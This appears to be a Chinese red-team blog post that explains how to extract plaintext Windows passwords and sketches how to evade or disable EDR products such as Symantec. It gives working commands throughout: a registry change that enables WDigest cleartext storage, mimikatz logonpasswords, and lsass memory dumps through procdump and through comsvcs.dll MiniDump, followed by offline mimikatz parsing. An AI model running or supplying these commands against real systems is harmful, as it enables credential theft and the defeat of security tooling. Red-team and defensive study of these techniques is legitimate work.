Windows明文密码获取

1：简介

作者为网络安全从业者，专注红蓝对抗、本文尝试通过框架性梳理的方式来整理一些细致的知识点，将它们串联起来方便记忆。
本文将探讨如下几个方面的内容：
1：无安全软件情况下获取windows明文密码的方法。
2：针对symantec为代表的各种EDR的对抗方法。
一些细节、操作流程、截图，将会以新写文档的方式来整理。哈哈，毕竟好记性不如烂笔（jian）头（pan）~~

2：前提

（1）windows2008及之前操作系统，直接运行抓取即可。
（2）windows2012及之后操作系统，需要修改注册表键值，下次登录后即可成功抓取。
将HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1，类型为DWORD 32
。一句话命令如下：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

3：无安全软件

3.1：在线获取

当然这里在线获取是指直接在对方机器上获取，最直接且简单的方式即通过上传mimikatz到对方机器，通过mimikatz读取lsass.exe进程的内存，再解密，获得明文密码。
命令如下：

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > pass.txt

3.2：离线获取

很多时候由于免杀、文件上传等乱七八糟的问题，并不方便上传mimikatz等工具，这时候就可以Dump进程lsass.exe的内存，保存下来，然后下载到本地，通过本地读取的方式来获得明文密码。
1：Dump内存
方法一：通过微软官方工具procdump实现dump内存：

procdump.exe -accepteula -ma lsass.exe lsass.dmp

方法一优点在于procdump.exe是微软的工具，有签名的。
方法二：通过comsvcs.dll的导出函数MiniDump实现dump内存：

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 777 C:\lsass.dmp full"

注意：这里777是lsass.exe的pid。
方法二的优点在于，不需要上传文件。
2：本地读取
通过将步骤一dump下来的lsass.dmp下载回本地，通过mimikatz来实现离线读取。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit > mima.txt

接下来打开mima.txt即可看到想要的内容：）

4：针对卡巴斯基为代表的各种EDR抓取

4.1：思路

（1）绕过，杀软都有自己的检测方式，我们弄明白它的检测方式来绕过即可。当下最火的是XPN大牛文章里学到的SSP的方式。

（2）强干，干掉symantec，然后再正常抓取明文即可。

4.2：实现

（1）绕过
这里简单把方法列出来，读本文的大佬直接用就行，至于symantec怎么防御这些细节，新写文章来聊聊天：）
方法一：SSP绕过
XPN大佬在blog中写出了SSP的方式，文章地址：https://blog.xpnsec.com/exploring-mimikatz-part-2/；
3gstudent大佬也写了相关的实现分析文章，文章地址：https://3gstudent.github.io/3gstudent.github.io/Mimikatz中SSP的使用/
当然，对于我这种英文弱鸡，我还是看的3gstudent的文章。简单来讲，就是你通过SSP这种方式能绕过以symantec为代表的EDR的检测，至于SSP是啥，为啥SSP能绕过，该怎么样使用这种方法，代码咋写，我们下一篇文章来聊：）

（2）强干
杀软有些功能工作在ring0层，symantec阻止我们读取lsass.exe进程的内存的功能就在ring0工作，我们只要进入ring0，干掉它这个功能，然后再读取lsass.exe进程的内存即可，下下篇文章详细介绍：）

后记

先到这里，写文字对于我这样的老年人真是累，囧rz。周末就补完下篇、下下篇。
如果有大牛不吝赐教，欢迎斧正，不胜感激。像我这样的老年人特别喜欢别人提意见，感觉这样才能更好地提升自己呀！